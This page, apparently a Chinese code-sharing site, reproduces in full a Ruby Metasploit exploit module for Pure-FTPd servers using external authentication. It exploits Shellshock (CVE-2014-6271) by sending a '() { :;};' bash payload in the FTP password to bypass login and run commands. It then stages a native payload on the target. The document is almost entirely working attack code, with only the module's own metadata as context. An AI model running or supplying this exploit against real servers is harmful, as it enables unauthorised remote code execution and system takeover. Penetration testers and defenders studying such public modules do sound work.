扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name'=> 'Pure-FTPd External Authentication Bash Environment Variable Code Injection', 'Description' => %q( This module exploits the code injection flaw known as shellshock which leverages specially crafted environment variables in Bash. This exploit specifically targets Pure-FTPd when configured to use an external program for authentication. ), 'Author'=> [ 'Stephane Chazelas', # Vulnerability discovery 'Frank Denis', # Discovery of Pure-FTPd attack vector 'Spencer McIntyre' # Metasploit module ], 'References'=> [ ['CVE', '2014-6271'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc'] ], 'Payload' => { 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform'=> 'linux', 'Arch'=> ARCH_X86, 'CmdStagerFlavor' => :printf } ], [ 'Linux x86_64', { 'Platform'=> 'linux', 'Arch'=> ARCH_X86_64, 'CmdStagerFlavor' => :printf } ] ], 'DefaultOptions' => { 'PrependFork' => true }, 'DefaultTarget'=> 0, 'DisclosureDate' => 'Sep 24 2014')) register_options( [ Opt::RPORT(21), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) ], self.class) deregister_options('FTPUSER', 'FTPPASS') end def check # this check method tries to use the vulnerability to bypass the login username = rand_text_alphanumeric(rand(20) + 1) random_id = (rand(100) + 1) command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end" if send_command(username, command) =~ /^2\d\d ok./i return CheckCode::Safe if banner !~ /pure-ftpd/i disconnect command = "echo auth_ok:0; echo end" if send_command(username, command) =~ /^5\d\d login authentication failed/i return CheckCode::Vulnerable end end disconnect CheckCode::Safe end def execute_command(cmd, _opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") username = rand_text_alphanumeric(rand(20) + 1) send_command(username, cmd) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload") end execute_cmdstager(linemax: 500) handler end def send_command(username, cmd) cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\"" connect send_user(username) password_result = send_pass(cmd) disconnect password_result end end |
体验盒子
